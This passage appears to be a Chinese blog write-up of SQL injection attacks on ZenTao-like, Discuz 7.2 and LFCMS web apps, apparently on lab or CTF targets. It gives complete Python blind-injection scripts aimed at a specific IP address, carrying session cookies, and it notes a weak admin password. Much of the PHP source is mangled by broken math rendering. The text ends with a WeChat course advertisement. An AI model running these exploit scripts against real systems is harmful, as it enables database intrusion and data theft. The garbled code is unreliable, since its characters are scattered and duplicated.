class block extends control
{
public function __construct($moduleName = ‘’, KaTeX parse error: Expected '}', got 'EOF' at end of input: …:\_\_construct(moduleName, $methodName);
t
h
i
s
−
>
s
e
l
f
C
a
l
l
=
s
t
r
p
o
s
(
this->selfCall = strpos(
this−>selfCall=strpos(this->server->http_referer, common::getSysURL()) === 0 ||
t
h
i
s
−
>
s
e
s
s
i
o
n
−
>
b
l
o
c
k
M
o
d
u
l
e
;
i
f
(
this->session->blockModule; if(
this−>session−>blockModule;if(this->methodName != ‘admin’ and
t
h
i
s
−
>
m
e
t
h
o
d
N
a
m
e
!
=
′
d
a
s
h
b
o
a
r
d
′
a
n
d
!
this->methodName != 'dashboard' and !
this−>methodName!=′dashboard′and!this->selfCall and !KaTeX parse error: Expected 'EOF', got '}' at position 46: …ey()) die(''); }̲ public functio…module = ‘’, $id = 0)
{
m
o
d
e
=
s
t
r
t
o
l
o
w
e
r
(
mode = strtolower(
mode=strtolower(this->get->mode);
if(
m
o
d
e
=
=
′
g
e
t
b
l
o
c
k
l
i
s
t
′
)
e
l
s
e
i
f
(
mode == 'getblocklist') { } elseif(
mode==′getblocklist′)elseif(mode == ‘getblockdata’)
{
c
o
d
e
=
s
t
r
t
o
l
o
w
e
r
(
code = strtolower(
code=strtolower(this->get->blockid);
$params = $this->get->param;
p
a
r
a
m
s
=
j
s
o
n
_
d
e
c
o
d
e
(
b
a
s
e
64
_
d
e
c
o
d
e
(
params = json\_decode(base64\_decode(
params=json_decode(base64_decode(params));
t
h
i
s
−
>
v
i
e
w
T
y
p
e
=
(
i
s
s
e
t
(
this->viewType = (isset(
this−>viewType=(isset(params->viewType) and $params->viewType == ‘json’) ? ‘json’ : ‘html’;
$this->params = $params;
$this->view->code = $this->get->blockid;
f
u
n
c
=
′
p
r
i
n
t
′
.
u
c
f
i
r
s
t
(
func = 'print' . ucfirst(
func=′print′.ucfirst(code) . ‘Block’;
if(method_exists(‘block’, $func))
{
t
h
i
s
−
>
this->
this−>func($module);
}
else
{
$this->view->data =
t
h
i
s
−
>
b
l
o
c
k
−
>
this->block->
this−>block−>func($module, $params);
}
}
}
先对Referer进行了判断,如果不正确,直接die(),通过判断mode=getblockdata进入分支,传入blockid=case调用进入printcaseBlock
()函数
public function printCaseBlock()
{
if($this->params->type == ‘assigntome’)
{
}
elseif($this->params->type == ‘openedbyme’)
{
$cases =
t
h
i
s
−
>
d
a
o
−
>
f
i
n
d
B
y
O
p
e
n
e
d
B
y
(
this->dao->findByOpenedBy(
this−>dao−>findByOpenedBy(this->app->user->account)->from(TABLE_CASE)
->andWhere(‘deleted’)->eq(0)
->orderBy(
t
h
i
s
−
>
p
a
r
a
m
s
−
>
o
r
d
e
r
B
y
)
−
>
b
e
g
i
n
I
F
(
this->params->orderBy) ->beginIF(
this−>params−>orderBy)−>beginIF(this->viewType != ‘json’)->limit($this->params->num)->fi()
->fetchAll();
}
$this->view->cases = $cases;
}
判断params中的type值,传openedbyme从而进入orderBy()漏洞函数。
public function orderBy(KaTeX parse error: Expected '}', got 'EOF' at end of input: order) { if(this->inCondition and !$this->conditionIsTrue) return $this;
$order = str_replace(array(‘|’, ‘’, ‘_’), ’ ‘, $order);
p
o
s
=
s
t
r
i
p
o
s
(
pos = stripos(
pos=stripos(order, ‘limit’);
$orders =
p
o
s
?
s
u
b
s
t
r
(
pos ? substr(
pos?substr(order, 0, $pos) : $order;
$limit =
p
o
s
?
s
u
b
s
t
r
(
pos ? substr(
pos?substr(order, $pos) : ‘’;
o
r
d
e
r
s
=
t
r
i
m
(
orders = trim(
orders=trim(orders);
if(empty($orders)) return KaTeX parse error: Undefined control sequence: \w at position 27: …reg\_match('/^(\̲w̲+\.)?(`\w+`|\w+…/i’, $orders)) die(“Order is bad request, The order is $orders”);
$orders = explode(‘,’,
o
r
d
e
r
s
)
;
f
o
r
e
a
c
h
(
orders); foreach(
orders);foreach(orders as $i => $order)
{
KaTeX parse error: Double superscript at position 24: …se = explode(' '̲, trim(order));
foreach($orderParse as $key => $value)
{
v
a
l
u
e
=
t
r
i
m
(
value = trim(
value=trim(value);
if(empty(
v
a
l
u
e
)
o
r
s
t
r
t
o
l
o
w
e
r
(
value) or strtolower(
value)orstrtolower(value) == ‘desc’ or strtolower($value) == ‘asc’) continue;
$field = KaTeX parse error: Undefined control sequence: \* at position 9: value; /\̲*̲ such as t1.id …value, ‘.’) !== false) list($table, $field) = explode(‘.’,
f
i
e
l
d
)
;
i
f
(
s
t
r
p
o
s
(
field); if(strpos(
field);if(strpos(field, '') === false) $field = "$field`";
o
r
d
e
r
P
a
r
s
e
[
orderParse[
orderParse[key] = isset($table) ? $table . ‘.’ . $field :
f
i
e
l
d
;
u
n
s
e
t
(
field; unset(
field;unset(table);
}
o
r
d
e
r
s
[
orders[
orders[i] = join(’ ‘,
o
r
d
e
r
P
a
r
s
e
)
;
i
f
(
e
m
p
t
y
(
orderParse); if(empty(
orderParse);if(empty(orders[
i
]
)
)
u
n
s
e
t
(
i])) unset(
i]))unset(orders[$i]);
}
$order = join(’,', $orders) . ’ ’ . $limit;
$this->sql .= ’ ’ . DAO::ORDERBY . " $order";
return $this;
}
先将order中的|,_置换为空格,然后取第一次出现limit的位置,取值,对orders进行了正则匹配和处理,但是没有对limit进行处理,最后又把limit拼接到了ORDERBY语句中执行,导致了注入产生。
import base64
payload=b"“”{“orderBy”:“order limit 1;select (if(ascii(substr((select database()),1,1))>0,sleep(5),1))-- “,“num”:“1,1”,“type”:“openedbyme”}””"
base64encode_str = base64.b64encode(payload)
print(base64encode_str)
执行时间达到5秒多,说明sql语句被执行了。
import base64
import time
import requests
payload=b"“”{“orderBy”:“order limit 1;select (if(ascii(substr((select database()),1,1))>0,sleep(5),1))-- “,“num”:“1,1”,“type”:“openedbyme”}””"
headers={
‘User-Agent’:‘Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0’,
‘Cookie’:‘lang=zh-cn; theme=default; lastProduct=2; think_template=default; SECKEY_ABVK=sDKUFx0SI2QxP1RGsU9FV8qwP8TB8dsS5s540TBV5ms%3D; BMAP_SECKEY=nYO150H6Wi-DT3mcAEoVLuT4r9CzC0S_Eze5tiiPyKXCUefAwVqUS-S_D0_0HfTtRUfRKLcQj3Zv0etp0wI6U-T73zjNXiLh_qCw8wxeIpYFhypp0iO4bRF5Z3Ybzte2BZQ9s7kcW32CL8iYEboDZNuDwUK6ApljNJr9yVz1spj8X9DACSY7j3raFA27vDw0; ASPSESSIONIDAQDDSBSS=GNHNFOMAHBLKHHMNBFNMEBMK; ASPSESSIONIDCQCCRATT=LBBHAMNAMBAOIMDHBFADKHLM; sid=abi792kma4oc97llvmdegnstt5; windowWidth=692; windowHeight=711; PHPSESSID=p9a6umsf1ajbc3d4tm5k9ge676; Hm_lvt_b60316de6009d5654de7312f772162be=1678363323; Hm_lpvt_b60316de6009d5654de7312f772162be=1678363707; f814212a5b521d45bd53097f6a4a5fdb_ci_session=d25dvapp153pkttr7sp9rrpak9hisg2i; lf_users___forward__=%2Findex.php%3Fs%3D%2Flists%2Findex%2Fid%2F55.html’,
‘Referer’: ‘http://110.40.154.212:8081/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=eyJvcmRlckJ5Ijoib3JkZXIgbGltaXQgMTtzZWxlY3QgKGlmKGFzY2lpKHN1YnN0cigoc2VsZWN0IGRhdGFiYXNlKCkpLDEsMSkpPjY0LHNsZWVwKDUpLDEpKS0tICIsIm51bSI6IjEsMSIsInR5cGUiOiJvcGVuZWRieW1lIn0=’
}
result = ‘’
for times in range(1, 88):
min = 0
max = 128
mid = (min + max) // 2
while min < max:
payload = ‘{’+f’“orderBy”:"order limit 1;select (if(ascii(substr((select database()),{times},1))>{mid},sleep(5),1))-- ",“num”:“1,1”,“type”:“openedbyme”’ +‘}’
base64encode_str = base64.b64encode(payload.encode(‘utf-8’)).decode(‘utf-8’)
url=“http://110.40.154.212:8081/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=”+base64encode_str
startTime = time.time()
resp = requests.get(url,headers=headers)
if time.time()-startTime > 3:
min = mid + 1
else:
max = mid
mid = (min + max) // 2
result += chr(min)
print(result)
八、Discuz7.2
function implodeids(KaTeX parse error: Expected '}', got 'EOF' at end of input: …y) { if(!empty(array)) {
return “'”.implode(“‘,’”, is_array($array) ?
a
r
r
a
y
:
a
r
r
a
y
(
array : array(
array:array(array)).“'”;
} else {
return ‘’;
}
}
漏洞成因是impledeids将$groupids数组用,分隔开,组成了类似于’1’,‘2’,‘3’,‘4’,这样的字符返回,刚取出第一个转义符,会将正常的’转义,编程’1’,‘’,‘3’,‘4’,从而导致第三个引号和第五个引号闭合成功,3成功逃逸。
payload如下:
import re
import requests
s=requests.session()
headers={
‘User-Agent’:‘Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0’
}
url=“http://110.40.154.212:8041/faq.php?action=grouppermission&gids[9]=%27&gids[10][0]=”
#payload=“) and updatexml(1,concat(0x7e,(select%20database()),0x7e),1)–+”
payload=“)%20and%20updatexml(1,concat(0x7e,(select%20table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e),1)–+”
url=url+payload
resp=s.get(url,headers=headers)
obj=re.compile(r’.*?XPATH syntax error: (?P.*?)
.*?')
result3 = obj.search(resp.text)
print(result3.group(“name”))
九、Poscms
弱口令 admin admin
十、LFCMS
import time
import requests
headers = {
‘User-Agent’: ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0’,
‘Cookie’: ‘lang=zh-cn; theme=default; lastProduct=2; think_template=default; SECKEY_ABVK=r765x/a4GpSgTpZWaXpRMHGkAr7A4jYs9j+/yYIFI7Y%3D; BMAP_SECKEY=Z87tl5vu1Tck9__fh5HGqx6jV4LMqg2iVrfDcWFYuWoF3KRhPMPWQDJK0UN3Rb_WfQH6WOFCQ58HM_bVAAO1ybF4klLwASuNrZ58kxks8KcFKBrZLKog6RbpZMwnRPdf0gPtuf_jkc3L4IfZPBOFxulTgRykV0wGZViV3ogirrqFatnGW5Kbam1L3iZgBr6b; Hm_lvt_b60316de6009d5654de7312f772162be=1678712949,1678717766,1678718983,1678720108; Py1_sid=moGWFy; Py1_visitedfid=2; f814212a5b521d45bd53097f6a4a5fdb_ci_session=qphormh4vscqqohbil540na3eqmijksd; member_uid=1; member_cookie=8f85827484437f675f15; finecms-admin-login=admin; PHPSESSID=kgaha0hgok2fobjk7ic4pb0292; lf_users___forward__=%2Findex.php%3Fs%3D%2Flists%2Findex%2Fid%2F4.html’
}
flag = ‘’
for times in range(1, 10):
count = 1
for j in range(1,130):
url = f’http://110.40.154.212:8070/index.php/Ajax/randMovie?limit=1&category=1%20AND%20(SELECT%208586%20FROM%20(SELECT(if(STRCMP({count},ORD(MID((SELECT%20DATABASE()),{times},1))),sleep(5),1)))YVDz)’
#1 AND (SELECT 8586 FROM (SELECT(if(STRCMP(2,ORD(MID((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))),sleep(5),1)))YVDz) 爆表
startTime = time.time()
resp = requests.get(url, headers=headers)
if time.time() - startTime > 3:
count += 1
else:
flag += chr(count)
break
time.sleep(1)
print(flag)
十一、CVE-2022-0760
import requests
import time
这里我们直接猜测flag和上一个sql注入的flag位置相同
flag
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算
因篇幅有限,仅展示部分资料
一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算
555
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
